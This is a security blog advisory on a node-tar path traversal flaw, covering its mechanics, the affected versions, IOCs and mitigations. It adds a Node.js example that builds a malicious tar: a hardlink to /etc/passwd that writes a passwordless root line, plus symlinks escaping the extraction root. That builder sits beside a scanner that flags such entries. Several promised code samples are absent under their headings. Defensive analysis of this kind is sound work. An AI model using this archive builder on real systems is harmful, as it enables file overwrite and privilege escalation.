
CVE-2026-23745: A Deep Dive into the node-tar Arbitrary File Overwrite Vulnerability

Posted on: 19 Jan 2026 | Author: Foresiet

Introduction

CVE-2026-23745 is a high-severity path traversal flaw in node-tar, the tar library for Node.js. Versions up to and including 7.5.2 strip leading slashes and traversal components from an entry's path, but do not apply the same sanitization to the linkpath of hardlink and symlink entries, even with preservePaths left at its default of false. A malicious archive can therefore create a link that points outside the extraction root: a hardlink to an existing file lets a later write in the same archive overwrite that file, and a symlink with an absolute target points wherever the attacker chooses. The issue was disclosed in January 2026 and fixed in 7.5.3. It affects anything that extracts untrusted archives with node-tar, including npm tooling, CI/CD pipelines, and applications that accept uploaded tar files. This analysis covers the mechanics, exploitation, observed activity, IOCs, and mitigations.

Executive Summary

A crafted tar archive can make node-tar 7.5.2 and earlier create a hardlink or symlink whose target lies outside the extraction directory, because linkpath is not sanitized the way entry.path is. The result is arbitrary file overwrite (through a hardlink to an existing file) or symlink poisoning (through an absolute target), with no authentication or network access needed beyond getting the archive extracted. The fix shipped in node-tar 7.5.3 (advisory GHSA-8qq5-rm4j-mr97). No public proof of concept had been released at the time of writing; the bug is closely related to the 2021 node-tar path traversal issues.

History and Development

node-tar has a history of path traversal issues (for example CVE-2021-32803 and CVE-2021-32804, covering symlink and absolute path handling). CVE-2026-23745 surfaced in January 2026 via GitHub advisory GHSA-8qq5-rm4j-mr97. Maintainer isaacs patched it in commit 340eb285b6d986e91969a1170d7fe9b0face405e, released as v7.5.3. Debian's security tracker added the issue on January 17, 2026, and unstable carried the fix by January 18. No public PoC existed before disclosure; the flaw resembles the older tar vulnerabilities that allowed arbitrary writes.

Technical Analysis: How CVE-2026-23745 Works

The flaw is in how symlink and hardlink entries are handled during extraction. With preservePaths: false (the default), node-tar strips leading / and traversal components from entry.path, but entry.linkpath, the link's target, is not sanitized the same way.

  1. Extraction flow: tar.x() processes entries in order; for a Symlink or Hardlink entry it creates the link at the sanitized entry.path, using entry.linkpath as the target.
  2. Bypass: an absolute linkpath (e.g., /etc/shadow), or a relative one that climbs out of the root with .., is used as-is and so escapes the extraction root. A hardlink to an existing file means a later entry written to the link's path overwrites the linked file; a symlink with an absolute target points outside the root.

Example vulnerable code pattern (simplified from node-tar):

Attack scenario:
  1. Malicious tar: an entry with path "foo", linkpath "/target/secret", and type symlink creates foo as a symlink to /target/secret, so /target/secret is now reachable through the extraction directory.
  2. Impact: overwrite configuration files, inject keys, escalate privileges.
  3. Evasion: the archive looks like any normal extraction; no authentication or network access is needed.

In extraction logs this shows up as unexpected symlinks or hardlinks pointing at absolute paths.

CVE-2026-23745 Evolution: Exploit Details

The patch centres on validating linkpath. Exploitation is correspondingly simple: craft a tar with an absolute linkpath in a symlink or hardlink entry and get it extracted by a vulnerable version.

PoC Concept (Python tar creation)

Extracted with a vulnerable node-tar, the archive creates a link to /etc/passwd inside the extraction directory, and a subsequent write to that path lands in /etc/passwd.

No public full PoC yet; similar to historical GHSA advisories.

Current Campaigns

Exploitation so far is limited: the CVE is fresh (disclosed around January 16-17, 2026). The likeliest vector is the npm supply chain, for example a malicious package that ships a crafted archive and extracts it at install or build time. No widespread scanning has been reported; watch for dependency confusion or typosquatting that pulls in a vulnerable node-tar. Debian tracks the fix, and the npm ecosystem is presumably auditing dependents.

Who is at risk from CVE-2026-23745 (node-tar Arbitrary File Overwrite)?

  • Developers using node-tar ≤ 7.5.2 in their projects
  • Anyone extracting untrusted tar archives (npm packages, downloads, CI/CD pipelines)
  • CI/CD systems that automatically unpack archives
  • Applications that process user-uploaded tar files
  • npm package maintainers with vulnerable dependencies

Indicators of Compromise (IOCs)

  • Tar entries: linkpath starting with / or absolute.
  • Filesystem: unexpected symlinks/hardlinks to system paths.
  • Network: none (local extraction).

YARA rule:

Monitor extraction logs for absolute linkpaths.
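Both the PoC concept above and the IOCs in this section, as one added example that is not the page's own code: the page sketches its PoC in Python, but this version is plain Node.js with no tar library, so it sits next to the rest of the examples here. It writes a ustar archive in memory containing the kinds of link entries described (hardlink to an absolute target, symlink to an absolute target, symlink climbing out with ..), plus a benign symlink, then walks the headers and reports every link entry whose target would leave the extraction root. Entry names and contents are constructed; the "escapes root" rule is this example's reading of the IOC, not a signature from any vendor.

```javascript
const BLOCK = 512;

// Octal field as tar expects it: zero-padded digits followed by NUL.
function octal(n, width) { return n.toString(8).padStart(width - 1, '0') + '\0'; }

// Encode one ustar header. `type` is the typeflag: '0' file, '1' hardlink, '2' symlink.
function header(name, type, { size = 0, linkname = '' } = {}) {
  const h = Buffer.alloc(BLOCK);
  h.write(name, 0, 100);
  h.write(octal(0o644, 8), 100);      // mode
  h.write(octal(0, 8), 108);          // uid
  h.write(octal(0, 8), 116);          // gid
  h.write(octal(size, 12), 124);
  h.write(octal(0, 12), 136);         // mtime
  h.write('        ', 148);           // checksum counts as spaces while summing
  h.write(type, 156);
  h.write(linkname, 157, 100);
  h.write('ustar\0', 257);
  h.write('00', 263);
  let sum = 0;
  for (const b of h) sum += b;
  h.write(sum.toString(8).padStart(6, '0') + '\0 ', 148);
  return h;
}

function fileEntry(name, content) {
  const data = Buffer.from(content);
  const padded = Buffer.alloc(Math.ceil(data.length / BLOCK) * BLOCK);
  data.copy(padded);
  return Buffer.concat([header(name, '0', { size: data.length }), padded]);
}

// Constructed archive: the hardlink-then-file pair that overwrites the target,
// two symlinks that leave the root, and one benign symlink for contrast.
function buildMaliciousTar() {
  return Buffer.concat([
    header('foo', '1', { linkname: '/etc/passwd' }),        // hardlink, absolute target
    fileEntry('foo', 'root::0:0:root:/root:/bin/bash\n'),    // writes through the hardlink
    header('bar', '2', { linkname: '/target/secret' }),     // symlink, absolute target
    header('baz', '2', { linkname: '../../outside' }),      // symlink, climbs above root
    header('ok', '2', { linkname: 'sibling' }),             // benign relative symlink
    Buffer.alloc(BLOCK * 2),                                // end-of-archive marker
  ]);
}

// Walk headers only (skipping file data) and return one record per entry.
function listEntries(buf) {
  const entries = [];
  const cstr = (off, len) => buf.toString('utf8', off, off + len).split('\0')[0];
  for (let off = 0; off + BLOCK <= buf.length;) {
    if (buf[off] === 0) break; // zero block = end of archive
    const size = parseInt(cstr(off + 124, 12), 8) || 0;
    entries.push({
      path: cstr(off, 100),
      type: buf.toString('utf8', off + 156, off + 157),
      linkpath: cstr(off + 157, 100),
    });
    off += BLOCK + Math.ceil(size / BLOCK) * BLOCK;
  }
  return entries;
}

// The IOC: a link target that is absolute, or that climbs above the extraction
// root. Hardlink targets resolve from the root; symlink targets resolve from
// the directory containing the link, so the link's own depth counts.
function escapesRoot(entry) {
  if (entry.linkpath.startsWith('/')) return true;
  let depth = entry.type === '2'
    ? entry.path.split('/').filter(s => s && s !== '.').length - 1
    : 0;
  for (const seg of entry.linkpath.split('/')) {
    if (seg === '..') { if (--depth < 0) return true; }
    else if (seg && seg !== '.') depth++;
  }
  return false;
}

function findUnsafeLinks(buf) {
  return listEntries(buf)
    .filter(e => (e.type === '1' || e.type === '2') && escapesRoot(e))
    .map(e => `${e.path} -> ${e.linkpath}`);
}

console.log(findUnsafeLinks(buildMaliciousTar()));
// [ 'foo -> /etc/passwd', 'bar -> /target/secret', 'baz -> ../../outside' ]
```

Run the same `findUnsafeLinks` over any archive read from disk (`fs.readFileSync`) before handing it to an extractor; it only needs headers, so it is cheap even on large archives. GNU long-name and PAX extension headers are not parsed here, so a production scanner must handle those or it can be evaded by a long linkpath.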

Mitigation and Best Practices

  • Patch: upgrade node-tar to 7.5.3 or later and regenerate lockfiles so transitive dependents pick up the fixed version.
  • Workaround: leave preservePaths at its default of false (never enable it for untrusted input) and add a filter/onentry callback that rejects symlink and hardlink entries whose linkpath is absolute or escapes the extraction directory.
  • Prevention: extract untrusted archives in a sandbox or throwaway directory and validate the contents before use.
  • Detection: file integrity monitoring on sensitive paths; EDR alerts for unexpected writes by extraction processes.

Conclusion

CVE-2026-23745 revives the path traversal risk in node-tar, allowing a malicious archive to overwrite arbitrary files through unsanitized link targets. The quick fix in 7.5.3 limits exposure, but dependency audits should not wait: node-tar is pulled in transitively by a large share of the ecosystem. Prompt upgrades and validation of untrusted archives remain essential in Node.js environments.
